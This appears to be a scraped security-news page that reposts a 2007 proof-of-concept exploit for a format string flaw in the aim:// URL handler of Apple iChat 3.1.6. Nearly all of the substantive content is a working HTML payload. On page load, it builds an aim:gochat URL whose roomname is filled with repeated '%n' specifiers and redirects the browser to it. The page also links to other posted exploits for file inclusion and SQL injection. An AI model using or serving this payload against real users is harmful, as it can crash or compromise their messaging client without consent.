_
_ _ 11.21.2008
 
_ Navigation: _
Main Page Technology Downloads Security Entertainment Videos
Search Site: Advanced
_
 
Login Login
 
Register Register
   
_ News Item

Apple iChat 3.1.6 v441 aim:// URL Handler Format String Exploit PoC

Jan 22 2007 18:55:16
Source: ace
vote bad  vote good
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>MOAB-20-01-2007</title>
<script>
function boom() {
var str = '';
for (var i = 0; i < 20; i++) {
str = str + escape('A%n');
}
str = 'aim:gochat?roomname=' + str;
window.location = str;
}
</script>
</head>
<body onload="boom()">
</body>
</html>

» full story @ source-link: ace
Related Articles:
» Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
» S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
» PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
» SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
_ Comments
Add Comment
You must be registered and logged in to add comments!

Register
Login
_ Sponsors

_ Sponsors